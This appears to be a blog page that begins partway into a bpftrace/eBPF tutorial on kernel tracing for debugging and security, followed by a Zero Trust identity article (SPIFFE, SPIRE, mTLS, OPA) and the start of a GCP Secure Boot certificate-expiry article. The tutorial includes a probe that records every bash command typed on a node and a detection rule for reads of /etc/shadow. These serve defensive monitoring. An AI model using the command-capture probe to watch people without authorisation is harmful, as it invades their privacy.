@[kubelet]:    841
@[node_exporter]: 203
@[sshd]:       47

Each line is a process name and how many syscalls it made in 5 seconds. If this runs and produces output, everything in this episode will work on your node.
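
When the output is longer than a screen, it helps to rank it. The following is a minimal sketch that parses map output in the `@[key]: count` form shown above and returns the busiest processes; the function names are hypothetical and the sample text is the abridged output from this section.

```python
import re

# One map entry per line: @[key]: count
ENTRY = re.compile(r"^@\[(?P<key>.+)\]:\s+(?P<count>\d+)$")


def parse_counts(output):
    """Turn bpftrace count() map output into a {key: count} dictionary."""
    counts = {}
    for line in output.splitlines():
        match = ENTRY.match(line.strip())
        if match:
            counts[match.group("key")] = int(match.group("count"))
    return counts


def top(counts, n=3):
    """Return the n largest (key, count) pairs, largest first."""
    return sorted(counts.items(), key=lambda kv: kv[1], reverse=True)[:n]


SAMPLE_OUTPUT = """Attaching 1 probe...

@[containerd]: 312
@[kubelet]:    841
@[node_exporter]: 203
@[sshd]:       47
"""

if __name__ == "__main__":
    for name, count in top(parse_counts(SAMPLE_OUTPUT)):
        print(f"{name:<16} {count}")
```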

Not on a self-managed node? EKS managed nodes and GKE nodes don’t have bpftrace pre-installed, but you can run it from a privileged debug pod: kubectl debug node/<node-name> -it --image=quay.io/iovisor/bpftrace. The tool runs on the host kernel — you get full kernel visibility even from a pod.


A node in production started showing elevated TCP latency — p99 at 180ms, where p99 was normally under 10ms. The application logs were clean. The APM dashboard showed nothing unusual at the service level. CPU, memory, disk: all normal. The load balancer health checks were passing.

I had 12 minutes before the on-call escalation would have gone to the application team and started a war room.

I ran one command:

bpftrace -e 'kretprobe:tcp_recvmsg { @bytes[comm] = hist(retval); }' --timeout 10

Ten seconds of sampling. The histogram output showed a single process — backup-agent — receiving 4MB chunks at irregular intervals. Not the application. Not the service mesh. A backup agent that runs at the infrastructure layer, saturating the receive path with large reads during its scheduled window.

Found with a single ten-second sample. War room averted.

What made that possible is something most engineers don’t know about bpftrace: that one-liner is not a monitoring query. It’s a complete eBPF program — compiled, loaded into the kernel, attached to the tcp_recvmsg kernel return probe, run, and cleaned up — all in ten seconds. bpftrace is a compiler that happens to have a very convenient command-line interface.


What bpftrace Actually Is

bpftrace is not a monitoring tool. It’s an eBPF compiler with a high-level scripting language designed for one-shot investigation.

When you run bpftrace -e 'kretprobe:tcp_recvmsg { ... }', this is what happens:

Your one-liner
      ↓
bpftrace's built-in LLVM/Clang frontend
      ↓
eBPF bytecode (.bpf.o in memory)
      ↓
Kernel verifier validates the program
      ↓
JIT compiler compiles to native machine code
      ↓
Program attaches to tcp_recvmsg kretprobe
      ↓
Runs until Ctrl-C or --timeout
      ↓
Output printed, maps freed, program detached

The kernel doesn’t know bpftrace wrote the program. It’s the same path as Falco, Cilium, Tetragon — kernel program loaded via the BPF syscall, verified, JIT-compiled, attached to a probe. bpftrace just wraps that entire process in a scripting language that takes 30 seconds to write instead of an afternoon.

This is why bpftrace can answer questions that no other tool can: it compiles to a kernel-level observer that fires on any event in the kernel, on any process, on any container — without any prior instrumentation.


The Four Probe Types You’ll Use Most

bpftrace supports 20+ probe types. These four cover 90% of production debugging:

kprobe / kretprobe — Kernel Functions

Attaches to the entry (kprobe) or return (kretprobe) of any kernel function. The most powerful probes for understanding what the kernel is actually doing.

# Fire on every call to tcp_connect — who's making new TCP connections?
bpftrace -e 'kprobe:tcp_connect { printf("%s PID %d connecting\n", comm, pid); }'

# On return from tcp_recvmsg — how large are the reads per process?
bpftrace -e 'kretprobe:tcp_recvmsg { @[comm] = hist(retval); }'

# Count calls to vfs_write per process (file write activity)
bpftrace -e 'kprobe:vfs_write { @[comm] = count(); }'

Limitation: kernel functions are internal and can change between kernel versions. Use tracepoints (below) for stability when you can.

kprobe instability: A function targeted by a kprobe can be inlined by the compiler, which embeds the function’s code at its call sites with no separate entry point. When that happens, the kprobe either fails to attach or never fires for the inlined call sites. Verify before relying on one: bpftrace -l 'kprobe:function_name'. An empty response means the function is not available as a probe point on this kernel (inlined, renamed, or absent). Use a tracepoint equivalent instead.

tracepoint — Stable Kernel Trace Points

Tracepoints are hooks explicitly placed in the kernel source. Unlike kprobes, they are treated as a stable interface and rarely change or disappear between versions. Use these for anything you need to work reliably across a fleet with mixed kernel versions.

# Every file open — process name + filename
bpftrace -e 'tracepoint:syscalls:sys_enter_openat {
    printf("%s %s\n", comm, str(args->filename));
}'

# Every outbound connect() call: process name and PID
bpftrace -e 'tracepoint:syscalls:sys_enter_connect {
    printf("%-16s %-6d\n", comm, pid);
}'

# List all available tracepoints (hundreds)
bpftrace -l 'tracepoint:syscalls:*' | head -30

uprobe — Userspace Function Probes

Attaches to a specific function in a userspace binary or library. Useful for observing application behaviour without recompiling.

# What bash commands are being typed on this node?
# readline() returns the entered line, so read retval on the return probe
bpftrace -e 'uretprobe:/bin/bash:readline { printf("%s\n", str(retval)); }'

# Python function calls
bpftrace -e 'uprobe:/usr/bin/python3:PyObject_Call { printf("Python call: pid %d\n", pid); }'

From a security standpoint: this is how you observe what an attacker is typing in an interactive shell they’ve obtained on your node — in real time, from the kernel, without touching the terminal session.

interval — Periodic Sampling

Runs a block of code on a fixed interval. Used for aggregation and periodic stats.

# Print the top file-opening processes every 5 seconds
bpftrace -e '
kprobe:vfs_open { @[comm] = count(); }
interval:s:5  { print(@); clear(@); }
'

The One-Liner Toolkit: Runnable Right Now

These run on any Linux node with BTF (kernel 5.8+, Ubuntu 20.04+, most managed K8s nodes):

# What files is every process opening right now? (30-second view)
bpftrace -e 'tracepoint:syscalls:sys_enter_openat {
    printf("%-16s %s\n", comm, str(args->filename));
}' --timeout 30

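# Who is sending UDP to port 53? (sees every container on the node, no sidecar needed)
# Approximation: covers connected UDP sockets; sendto() with an explicit address is missed
bpftrace -e 'kprobe:udp_sendmsg {
    $sk = (struct sock *)arg0;
    $dport = $sk->__sk_common.skc_dport;
    $dport = ($dport >> 8) | (($dport << 8) & 0x00FF00);
    if ($dport == 53) { printf("%-16s %d\n", comm, pid); }
}'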

# Latency histogram for all read() syscalls: find the slow process
bpftrace -e '
tracepoint:syscalls:sys_enter_read { @start[tid] = nsecs; }
tracepoint:syscalls:sys_exit_read /@start[tid]/ {
    // the filter skips reads that were already in flight when tracing began
    $latency = nsecs - @start[tid];
    @latency[comm] = hist($latency);
    delete(@start[tid]);
}
interval:s:15 { exit(); }'

# Which process is using the most CPU right now? (99Hz sampling for 10 seconds)
bpftrace -e 'profile:hz:99 { @[comm] = count(); } interval:s:10 { exit(); }'

# Syscall frequency over 10 seconds: find unusual process activity
bpftrace -e 'tracepoint:raw_syscalls:sys_enter { @[comm, args->id] = count(); }
interval:s:10 { exit(); }' \
  | sort -k3 -rn | head -20

# New TCP connections over the next 30 seconds: process and IPv4 destination
bpftrace -e 'kprobe:tcp_connect {
    $sk = (struct sock *)arg0;
    $dport = $sk->__sk_common.skc_dport;   // stored in network byte order
    printf("%-16s → %s:%d\n", comm,
           ntop($sk->__sk_common.skc_daddr),
           ($dport >> 8) | (($dport << 8) & 0xff00));
}
interval:s:30 { exit(); }'

# What is a specific PID doing? (replace 12345)
bpftrace -e 'tracepoint:syscalls:sys_enter_openat /pid == 12345/ {
    printf("%s\n", str(args->filename));
}'

Each of these compiles and loads in under 2 seconds. They leave no persistent state. When they exit, the kernel reverts to exactly the state it was in before.


The Security Use Cases

Watching an Active Session

If you suspect a process is running commands you didn’t deploy:

# See every bash command on this node in real time (retval of readline is the entered line)
bpftrace -e 'uretprobe:/bin/bash:readline { printf("%s %s\n", comm, str(retval)); }'

# Every process spawn — PID, parent, command
bpftrace -e 'tracepoint:syscalls:sys_enter_execve {
    printf("%-6d %-6d %s\n", pid, curtask->real_parent->tgid, str(args->filename));
}'

This is the kernel-level version of watching /var/log/auth.log, except that it can’t be suppressed from inside a container, because the probe runs in host kernel space. An attacker who has compromised a container with root inside the container cannot prevent a bpftrace program on the host from observing their syscalls. Root on the host itself is a different matter: it can detach probes.

Detecting Unexpected Network Activity

# Any process making a connection to a non-standard port
bpftrace -e 'kprobe:tcp_connect {
    $sk = (struct sock *)arg0;
    $dport = $sk->__sk_common.skc_dport;                // stored in network byte order
    $port = ($dport >> 8) | (($dport << 8) & 0xff00);   // swap to host byte order
    if ($port != 80 && $port != 443 && $port != 53) {
        printf("%-16s port %d\n", comm, $port);
    }
}'

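# sendto() calls with an explicit IPv4 destination: spot DNS going to an unexpected resolver or port
bpftrace -e 'tracepoint:syscalls:sys_enter_sendto /args->addr != 0/ {
    $sa = (struct sockaddr_in *)args->addr;
    if ($sa->sin_family == 2) {                 // 2 = AF_INET
        $p = $sa->sin_port;                     // network byte order
        printf("%-16s → %s:%d\n", comm, ntop($sa->sin_addr.s_addr),
               ($p >> 8) | (($p << 8) & 0xff00));
    }
}'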

Watching File Access on Sensitive Paths

# Any open of /etc/passwd or /etc/shadow (exact path match only)
bpftrace -e 'tracepoint:syscalls:sys_enter_openat {
    if (str(args->filename) == "/etc/passwd" ||
        str(args->filename) == "/etc/shadow") {
        printf("%-16s PID %-6d opened %s\n", comm, pid, str(args->filename));
    }
}'

Production Gotchas

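CPU overhead: bpftrace probes fire synchronously in the traced context. High-frequency probes on hot kernel paths (vfs_read, sys_enter_* without filtering) can add 10–20% overhead. Always bound a test run (for example with an interval:s:30 { exit(); } probe, or by wrapping the command in coreutils timeout) and watch system CPU time (%sy and %si in top) before running on a production node.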

Maps grow until you clear them: @[comm] = count() accumulates an entry per unique comm value for the whole session, up to bpftrace’s per-map key limit. Use clear(@) in an interval block to reset the map periodically, or delete(@[key]) to drop individual entries.

kprobe instability: Functions targeted by kprobes can be renamed, removed, or inlined by the compiler between kernel versions. An inlined function has no symbol to attach to, so the probe either fails to attach or never fires. If a kprobe isn’t firing, verify the function exists: bpftrace -l 'kprobe:function_name'. If it returns nothing, the function is not probeable on this kernel. Use a tracepoint equivalent instead.
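
The check-then-fall-back routine can be scripted. The sketch below is a minimal illustration, not part of bpftrace: first_available_probe and the LISTER override are hypothetical names, and the only real command it relies on is bpftrace -l.

```shell
# Print the first probe from the argument list that the lister can resolve.
# LISTER is a hypothetical override (useful for dry runs); the default is `bpftrace -l`.
first_available_probe() {
    local lister="${LISTER:-bpftrace -l}" probe
    for probe in "$@"; do
        # `bpftrace -l PROBE` prints the probe if it exists and nothing otherwise.
        if [ -n "$($lister "$probe" 2>/dev/null)" ]; then
            printf '%s\n' "$probe"
            return 0
        fi
    done
    return 1
}
```

Usage: first_available_probe 'kprobe:vfs_open' 'tracepoint:syscalls:sys_enter_openat' prints whichever of the two exists on this kernel, preferring the first. List the tracepoint last so it acts as the stable fallback.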

Container PIDs: PIDs inside a container are different from host PIDs. When a container shows PID 1 internally, the host kernel sees it as PID 8432 (or whatever was assigned), and bpftrace’s pid built-in always gives you the host-namespace PID. To see both values for a known host PID, run grep NSpid /proc/<host-pid>/status: the first value is the host PID and the last value is the PID inside the container. Or use curtask->real_parent->tgid in your probe to walk the process tree. This matters when you filter by pid in a one-liner and get no output: you may be filtering on the container-namespace PID instead of the host one.
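
Going the other way, from a PID seen inside a container to the host PID that bpftrace expects, means scanning the NSpid lines under /proc. A minimal sketch, assuming a Linux host where /proc/<pid>/status exposes NSpid; the function name host_pids_for_container_pid and the optional proc-root argument are illustrative only.

```shell
# Print every host PID whose innermost-namespace PID equals the given container PID.
# Usage: host_pids_for_container_pid CONTAINER_PID [PROC_ROOT]
# PROC_ROOT defaults to /proc; it is a parameter only so a fixture directory can be used.
host_pids_for_container_pid() {
    local want="$1" proc_root="${2:-/proc}" status
    for status in "$proc_root"/[0-9]*/status; do
        [ -r "$status" ] || continue
        # NSpid lists one PID per nested namespace: host first, innermost last.
        # Processes that are not in a nested PID namespace have a single value and are skipped.
        awk -v want="$want" '$1 == "NSpid:" && NF > 2 && $NF == want { print $2 }' \
            "$status" 2>/dev/null
    done
}
```

Usage: host_pids_for_container_pid 1 lists the host PID of every container init process on the node. Several containers can share the same inner PID, so expect more than one line and pick the right one by comm or cgroup before using it in a /pid == N/ filter.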

BTF requirement: the struct-access one-liners here ($sk->__sk_common.skc_daddr) rely on BTF for kernel type information. Without BTF, bpftrace needs matching kernel headers and explicit #include lines, and these one-liners fail as written. Check that /sys/kernel/btf/vmlinux exists before running them.
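
That check is easy to put in front of any struct-access one-liner. A small sketch; btf_available is a hypothetical helper name, and the optional path argument exists only so the check can be pointed at a different file.

```shell
# Succeed if the kernel exposes BTF type information at the given path.
# The default path is the one named above; the argument is optional.
btf_available() {
    [ -r "${1:-/sys/kernel/btf/vmlinux}" ]
}
```

Usage: btf_available || echo "no BTF on this node: struct-access one-liners will fail" >&2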


Quick Reference

Probe type               Syntax                                Use for
kernel function entry    kprobe:function_name                  Function arguments
kernel function return   kretprobe:function_name               Return value, latency
kernel tracepoint        tracepoint:subsys:name                Stable, versioned hooks
userspace function       uprobe:/path/to/bin:function          App-level observation
CPU sampling             profile:hz:99                         Flamegraphs, hot code
interval                 interval:s:N                          Periodic aggregation
process start            tracepoint:syscalls:sys_enter_execve  New process detection

Built-in variable   Value
pid                 Process ID (host namespace)
tid                 Thread ID
comm                Process name (up to 15 characters)
nsecs               Nanoseconds since boot
curtask             Pointer to the current task_struct
retval              Return value (kretprobe/uretprobe)
args                Probe arguments struct (tracepoints)

Key Takeaways

  • bpftrace is an eBPF compiler, not a monitoring agent — every one-liner compiles, loads, runs, and cleans up a complete kernel program
  • kretprobe and tracepoint cover most production debugging needs; use tracepoints for stability across kernel versions
  • The security use cases are unique: kernel-level observation that an attacker inside a container cannot suppress, because the probe runs on the host in kernel space
  • Every connection, every file open, every process spawn — observable in real time with a single command, no prior instrumentation
  • Production caution: high-frequency probes on hot paths add overhead; filter by pid/comm, bound each run with an interval exit or timeout, and watch system CPU time

What’s Next

bpftrace answers questions you ask in the moment. EP10 covers what happens when you need those answers continuously — not as a one-shot investigation tool, but as persistent telemetry recording every network connection across your entire cluster.

Flow observability from TC hooks is the always-on version: a persistent eBPF program recording every connection attempt, every retransmit, every dropped packet — the ground truth layer that everything above it interprets. When your APM says “timeout” and the kernel says “retransmit storm to one specific endpoint,” the kernel is right.

Next: network flow observability at the kernel level


Zero Trust Identity: SPIFFE, SPIRE, mTLS, and Continuous Verification

Reading Time: 7 minutes

The Identity Stack, Episode 13


TL;DR

  • Zero Trust means “never trust, always verify” — identity is verified continuously, not just at login time; network location provides no implicit trust
  • Human identity (users) and workload identity (services, pods, jobs) are separate problems — LDAP/Kerberos/OIDC solve the human side; SPIFFE/SPIRE solve the workload side
  • SPIFFE (Secure Production Identity Framework For Everyone) defines a standard for workload identity — a SPIFFE ID is a URI like spiffe://corp.com/ns/prod/sa/payments-svc
  • SPIRE (SPIFFE Runtime Environment) issues short-lived X.509 SVIDs (SPIFFE Verifiable Identity Documents) to workloads — certificates that rotate automatically, every hour
  • mTLS (mutual TLS) is how workloads prove identity to each other — both sides present certificates; no passwords, no API keys
  • The evolution: /etc/passwd (1970) → NIS → LDAP → Kerberos → SAML → OIDC → SPIFFE/SPIRE — the problem has always been the same; the trust boundary keeps moving outward

The Big Picture: From /etc/passwd to Zero Trust

1970s  /etc/passwd              ← trust: the local machine
       One machine, one user list

1984   NIS / Yellow Pages       ← trust: the local network
       Centralized, but cleartext, flat

1988   Kerberos                 ← trust: the KDC
       Tickets instead of passwords, network-wide

1993   LDAP                     ← trust: the directory server
       Hierarchical, scalable, encrypted (eventually)

2002   SAML                     ← trust: the IdP assertion
       Identity crosses the internet

2014   OIDC / OAuth2            ← trust: the JWT signature
       API-native, mobile-native, developer-native

2017   SPIFFE / SPIRE           ← trust: the workload certificate
       Automated identity for services, not humans

2026   Zero Trust               ← trust: nothing, verify everything
       Continuous verification, short-lived credentials,
       device posture, behavioral signals

EP01 of this series started with the chaos of per-machine /etc/passwd. This episode — EP13 — closes the loop: from that chaos to a model where identity is verified continuously, credentials expire in hours not years, and the network provides no implicit trust.


The Assumption That Zero Trust Rejects

Traditional security assumed: if you’re on the internal network, you’re trusted. A VPN user was treated as equivalent to someone at a desk in the office. A service running on the same Kubernetes node as another service was implicitly trusted.

That assumption broke in practice:

  • Compromised VPN credentials gave attackers full internal access
  • Lateral movement after initial compromise was easy — once inside, everything trusted you
  • Perimeter-based security had no visibility into east-west traffic (service-to-service)

Zero Trust inverts the model: the network provides no trust. Every access request is verified — user or service, internal or external, first request or hundredth. Trust is dynamic, contextual, and short-lived.


Human Zero Trust: Continuous Verification

For human users, Zero Trust extends OIDC and Conditional Access:

Short-lived tokens. Access tokens typically expire in about an hour (a common provider default; OIDC itself does not mandate a lifetime). Refresh tokens are revocable. A user who is terminated can have their refresh tokens revoked in Entra ID, and the next time their app tries to use the refresh token, it fails. The maximum blast radius of a stolen access token is bounded by its lifetime.

Device posture. The device the user authenticates from is part of the identity assertion. Conditional Access can require: device is managed (Intune-enrolled), device is compliant (no malware, full-disk encryption enabled, OS patched). A valid user credential from an unmanaged device is denied.

Behavioral signals. Entra ID Identity Protection and similar systems analyze login patterns — unusual location, impossible travel (login from Mumbai, then New York 5 minutes later), unfamiliar device. High-risk sign-ins trigger step-up authentication or are blocked automatically.

Privileged Access Management (PAM). For privileged operations (production shell access, AD admin), Zero Trust adds time-bounded just-in-time access:

Request:  "I need admin access to db01.corp.com for 2 hours to investigate an incident"
Approval: Manager approves via Slack/email/ticketing system
Grant:    Temporary role assignment or password checkout from the PAM vault
Access:   User SSHes with a one-time or time-limited credential
Expire:   Credential automatically revoked after 2 hours
Audit:    Full session recording available for review

CyberArk, BeyondTrust, and HashiCorp Vault implement this model. Vault’s SSH Secrets Engine issues short-lived SSH certificates:

# Request a signed SSH certificate (valid 30 minutes)
vault ssh \
  -role=prod-admin \
  -mode=ca \
  -mount-point=ssh-client-signer \
  USER@db01.corp.com

# Vault issues a certificate signed by the server's trusted CA
# sshd on db01 trusts that CA — no authorized_keys needed
# Certificate expires in 30 minutes — no cleanup required
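
For sshd on db01 to trust those certificates, it needs the signing CA's public key and a TrustedUserCAKeys directive. The helper below is a minimal sketch of the sshd side; the function name trust_user_ca and both file paths are illustrative assumptions, not something the setup above prescribes.

```shell
# Append a TrustedUserCAKeys directive to an sshd config file, once.
# Usage: trust_user_ca CA_PUBLIC_KEY_PATH SSHD_CONFIG_PATH
trust_user_ca() {
    local ca_pub="$1" sshd_config="$2"
    local line="TrustedUserCAKeys $ca_pub"
    # -x matches the whole line and -F treats it as a fixed string, so reruns are no-ops.
    grep -qxF -- "$line" "$sshd_config" 2>/dev/null || printf '%s\n' "$line" >> "$sshd_config"
}
```

Usage on the target host: fetch the CA public key with vault read -field=public_key ssh-client-signer/config/ca > /etc/ssh/trusted-user-ca-keys.pem, run trust_user_ca /etc/ssh/trusted-user-ca-keys.pem /etc/ssh/sshd_config, then reload sshd.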

Workload Identity: The Non-Human Problem

Services don’t have passwords they can type. A microservice calling another microservice needs to prove its identity — but you can’t give a Kubernetes pod a static API key (it’ll be in a config file, in a git repo, or in a crash dump within 6 months).

Workload identity solves this with short-lived, automatically rotated certificates — the service’s identity is its certificate, issued by a trusted CA, expiring in minutes to hours.

Traditional:                     Zero Trust:
  payments-svc → orders-svc        payments-svc → orders-svc
  Authentication: API key           Authentication: mTLS (X.509 cert)
  "Bearer sk_live_abc123"           cert: spiffe://corp.com/ns/prod/sa/payments-svc
  Rotation: manual (rarely done)    Rotation: automatic, every hour
  Revocation: change the key        Revocation: cert expires; new cert issued
  Audit: "API key was used"         Audit: "spiffe://payments-svc → spiffe://orders-svc"

SPIFFE: The Standard

SPIFFE (Secure Production Identity Framework For Everyone) defines what a workload identity looks like. The core concept is the SPIFFE ID — a URI in the format:

spiffe://<trust-domain>/<workload-path>

Examples:
  spiffe://corp.com/ns/prod/sa/payments-svc
  spiffe://corp.com/region/us-east/service/auth-api
  spiffe://corp.com/k8s/cluster-prod/namespace/payments/pod/payments-svc-abc123

The trust domain (corp.com) is the organizational boundary. The path is the workload identifier — typically encoding namespace, service account, or cluster information.
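
Splitting an ID into those two parts is a simple string operation. A minimal sketch, assuming workload IDs always carry a non-empty path; parse_spiffe_id is a hypothetical helper, and it performs none of the character-set validation a real SPIFFE library would.

```shell
# Split spiffe://<trust-domain>/<workload-path> into "trust-domain path".
# Returns non-zero for anything that does not have that shape.
parse_spiffe_id() {
    local id="$1" rest domain path
    case "$id" in
        spiffe://*) rest="${id#spiffe://}" ;;
        *) return 1 ;;
    esac
    domain="${rest%%/*}"        # everything before the first slash
    path="${rest#"$domain"}"    # the remainder, including the leading slash
    [ -n "$domain" ] && [ -n "$path" ] && [ "$path" != "/" ] || return 1
    printf '%s %s\n' "$domain" "$path"
}
```

Usage: parse_spiffe_id spiffe://corp.com/ns/prod/sa/payments-svc prints corp.com /ns/prod/sa/payments-svc, which is enough to check that a caller belongs to the expected trust domain before looking at its path.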

A SPIFFE ID is embedded in an SVID (SPIFFE Verifiable Identity Document) — either an X.509 certificate (X.509-SVID) or a JWT (JWT-SVID). The X.509-SVID is the standard form: the SPIFFE ID appears in the certificate’s Subject Alternative Name (SAN) field.

X.509 Certificate (SVID):
  Subject: CN=payments-svc
  SAN: URI=spiffe://corp.com/ns/prod/sa/payments-svc
  Validity: 1 hour
  Issuer: SPIRE Intermediate CA
  Signed by: corp.com trust bundle

Any service that has the corp.com trust bundle (the CA certificate chain) can verify that a certificate with spiffe://corp.com/... in the SAN was issued by the authorized CA for that trust domain.


SPIRE: The Runtime

SPIRE (SPIFFE Runtime Environment) is the reference implementation that issues SVIDs to workloads.

SPIRE Server
  ├── Node attestation: verifies the identity of the node/VM
  │   (AWS instance identity document, GCP service account, k8s node SA)
  └── Signs X.509 SVIDs for registered workloads (short-lived, auto-rotated)
         │
         ▼
SPIRE Agent (runs on every node)
  ├── Workload attestation: verifies the identity of the calling process
  │   (Kubernetes SA, Unix UID/GID, Docker container labels)
  └── Serves the SPIFFE Workload API (Unix socket)
         │
         ▼
Workload (your service)
  → gets its own certificate
  → gets the trust bundle (CA certs of trusted domains)
  → uses cert for mTLS with other services

The workload fetches its identity via the Workload API socket — no environment variables, no file mounts. The SPIRE Agent pushes new certificates before the old ones expire. Rotation is transparent to the workload.

# On a node with SPIRE Agent running:
# Fetch the SVID for the current workload
spire-agent api fetch x509 \
  -socketPath /run/spire/sockets/agent.sock

# Output shows:
# SPIFFE ID: spiffe://corp.com/ns/prod/sa/payments-svc
# Certificate: (PEM)
# Trust bundle: (PEM of issuing CA chain)
# Expires: 2026-04-27T02:00:00Z (1 hour from now)

mTLS: Both Sides Show ID

Mutual TLS (mTLS) is what makes SPIFFE useful operationally. In standard TLS, only the server presents a certificate — the client just verifies it. In mTLS, both sides present certificates. Both sides verify the other’s certificate against the trust bundle.

payments-svc → orders-svc connection:

TLS handshake:
  payments-svc presents: spiffe://corp.com/ns/prod/sa/payments-svc cert
  orders-svc presents:   spiffe://corp.com/ns/prod/sa/orders-svc cert

  Both verify:
    • cert signed by trusted CA (the corp.com SPIRE CA)
    • cert not expired
    • SPIFFE ID in SAN matches what's expected

  After handshake: encrypted channel, both sides verified
  Authorization: orders-svc checks its policy:
    "is spiffe://corp.com/ns/prod/sa/payments-svc allowed to call /api/orders?"

Service meshes (Istio, Linkerd, Consul Connect) implement mTLS transparently — the application doesn’t handle certificates; the sidecar proxy does. In Istio’s case, Citadel (now istiod) acts as the SPIFFE-compatible CA, issuing certificates to envoy sidecars. The application code doesn’t change.


Open Policy Agent: Authorization After Identity

Zero Trust separates identity from authorization. Once you know who the caller is (SPIFFE ID, OIDC token, user cert), a policy engine decides what they can do.

OPA (Open Policy Agent) is the standard for this:

# opa-policy.rego
package authz

import rego.v1

# Deny by default; the only call allowed is payments-svc reading orders
default allow := false

allow if {
  input.caller == "spiffe://corp.com/ns/prod/sa/payments-svc"
  input.method == "GET"
  startswith(input.path, "/api/orders")
}

The service checks OPA on each request: “caller=X wants to do Y to Z — allowed?” OPA evaluates the policy and returns a decision. The policy is version-controlled, tested, and deployed independently of the service.
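
The per-request check is a POST to OPA's data API with the request attributes as input. A minimal sketch of building that request body; opa_input is a hypothetical helper, and it assumes the values contain no quotes or backslashes because it does no JSON escaping.

```shell
# Build the JSON body for an OPA data API query from caller, method and path.
# Assumption: arguments contain no characters that need JSON escaping.
opa_input() {
    printf '{"input":{"caller":"%s","method":"%s","path":"%s"}}\n' "$1" "$2" "$3"
}
```

Usage, assuming an OPA server on localhost:8181 with the authz package loaded: curl -s -X POST -H 'Content-Type: application/json' -d "$(opa_input spiffe://corp.com/ns/prod/sa/payments-svc GET /api/orders/42)" http://localhost:8181/v1/data/authz/allow. The response carries the decision in its result field.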


⚠ Common Misconceptions

“Zero Trust means no trust.” Zero Trust means trust is earned dynamically through verification, not granted by network location. A verified user with a valid, compliant device and MFA is trusted — for the scope and duration of the verified session. The “zero” refers to implicit trust, not trust itself.

“SPIFFE replaces OIDC.” SPIFFE is for workload (service) identity. OIDC is for human (user) identity. They complement each other — a service has a SPIFFE identity; a user has an OIDC identity; the authorization layer accepts both.

“mTLS is complex to implement.” With a service mesh (Istio, Linkerd), mTLS is transparent — the sidecar handles it. Without a service mesh, the application needs to use the SPIFFE Workload API. The complexity is real but manageable, especially compared to the alternative of static API keys.


Framework Alignment

Domain                                                  Relevance
CISSP Domain 5: Identity and Access Management          Zero Trust extends IAM to workloads (SPIFFE) and continuous verification (short-lived tokens, device posture); it is the current frontier of identity architecture
CISSP Domain 3: Security Architecture and Engineering   The separation of identity (SPIFFE ID), authentication (mTLS), and authorization (OPA) is a clean architectural decomposition that scales to complex multi-service environments
CISSP Domain 4: Communications and Network Security     mTLS encrypts and authenticates every service-to-service connection, eliminating the assumption that east-west traffic on the internal network is safe
CISSP Domain 1: Security and Risk Management            Zero Trust is a risk management posture: it accepts that perimeter breach is inevitable and limits blast radius through continuous verification and least privilege

Key Takeaways

  • Zero Trust rejects network-based implicit trust — every request is verified regardless of source
  • Human identity: short-lived OIDC tokens, device posture checks, Conditional Access, JIT privileged access (Vault, CyberArk)
  • Workload identity: SPIFFE IDs in X.509 certificates, issued by SPIRE, rotated automatically every hour — no static API keys
  • mTLS lets services verify each other’s identity at the TLS layer — service meshes (Istio, Linkerd) implement it transparently
  • OPA handles authorization after identity is established — who you are ≠ what you can do
  • The series arc: /etc/passwd → NIS → LDAP → Kerberos → SAML → OIDC → SPIFFE/SPIRE — the problem has always been “how do you know who someone is, at scale, without trusting the network?” The answer keeps getting better.



The Identity Stack: From LDAP to Zero Trust — 13 episodes complete.

Start from EP01: What Is LDAP →

GCP Secure Boot Certificate Expiration 2026: What You Must Do Before June 24

Reading Time: 10 minutes


TL;DR

  • Three Microsoft UEFI Secure Boot certificates expire between June 24 and October 19, 2026
  • Any GCP Compute Engine instance with Secure Boot enabled, created before November 7, 2025, carries the old certs and is at risk
  • When the certs expire, instances may fail to boot after OS updates that pull in bootloaders signed only by the replacement 2023 certificates
  • GKE Shielded Nodes are affected too — node pools whose nodes haven’t been recreated since November 7, 2025 carry the old UEFI database
  • vTPM-sealed secrets, BitLocker, and Linux full disk encryption break if Secure Boot fails mid-update
  • Primary fix: recreate affected instances (post-Nov 7, 2025 instances include the updated UEFI DB automatically)
  • Emergency workaround if boot fails: temporarily disable Secure Boot, apply updates, re-enable

The Big Picture: The UEFI Secure Boot Trust Chain

  UEFI Firmware (PK — Platform Key, set by OEM/Google)
         │
         │  PK signs KEK updates
         ▼
  ┌─────────────────────────────────────────────┐
  │        KEK (Key Exchange Key Database)       │
  │  Microsoft Corporation KEK CA 2011           │ ← EXPIRING Jun 24, 2026
  │  Microsoft Corporation KEK 2K CA 2023        │ ← Replacement (new VMs only)
  └────────────────────┬────────────────────────┘
                       │  KEK authorizes DB/DBX updates
                       ▼
  ┌─────────────────────────────────────────────┐
  │         DB (Authorized Signature Database)   │
  │  Microsoft UEFI CA 2011 ← signs Linux Shim  │ ← EXPIRING Jun 27, 2026
  │  Microsoft Windows PCA 2011 ← signs WinBoot │ ← EXPIRING Oct 19, 2026
  │  Microsoft UEFI CA 2023 ← replacement       │ ← Present on post-Nov 7 VMs
  │  Windows UEFI CA 2023 ← replacement         │ ← Present on post-Nov 7 VMs
  └────────┬───────────────────────┬────────────┘
           │                       │
           ▼                       ▼
   Linux Shim (shim.efi)    Windows Boot Manager
           │
           ▼
       GRUB2 / systemd-boot
           │
           ▼
       Linux Kernel

GCP Compute Engine instances with Secure Boot enabled — created before November 7, 2025 — have a UEFI signature database that includes the 2011 certificates but not the 2023 replacements. When those 2011 certificates expire, new bootloader binaries (signed exclusively by the 2023 certs) will be rejected at boot time.


What Secure Boot Actually Does — and Why Certificate Expiry Breaks Booting

Secure Boot is UEFI’s mechanism for ensuring that only cryptographically signed, trusted software runs during the boot sequence. The trust chain works like this:

  1. Platform Key (PK): Root of trust, set by the hardware manufacturer or cloud provider. Authorizes updates to the KEK.
  2. Key Exchange Key (KEK): Authorizes modifications to the DB and DBX (the forbidden signatures database). Microsoft holds one KEK slot; OEMs often hold another.
  3. DB (Signature Database): Contains the public certificates used to verify bootloaders. If a bootloader binary is signed by a cert in DB, it’s allowed to run. If not, the firmware halts.
  4. DBX (Forbidden Signatures Database): Revocation list. Bootloaders explicitly listed here are blocked even if they were once trusted.

Where expiry matters: The DB certificates don’t “enforce” anything at runtime by checking dates themselves — UEFI doesn’t do certificate revocation in real time. The problem is different and more insidious: as Linux distributions and Microsoft ship updated bootloaders, those new binaries are signed only by the 2023 replacement certificates, not the expiring 2011 ones. If your VM’s DB doesn’t contain the 2023 certs, the UEFI firmware will reject the new shim, and the system won’t boot after an OS update that upgrades the bootloader package.

On Debian/Ubuntu, shim-signed upgrades. On RHEL/CentOS Stream, shim-x64 upgrades. Either way: new binary, new signature, old DB — boot failure.


The Three Certificates Expiring in 2026

1. Microsoft Corporation KEK CA 2011 — expires June 24, 2026

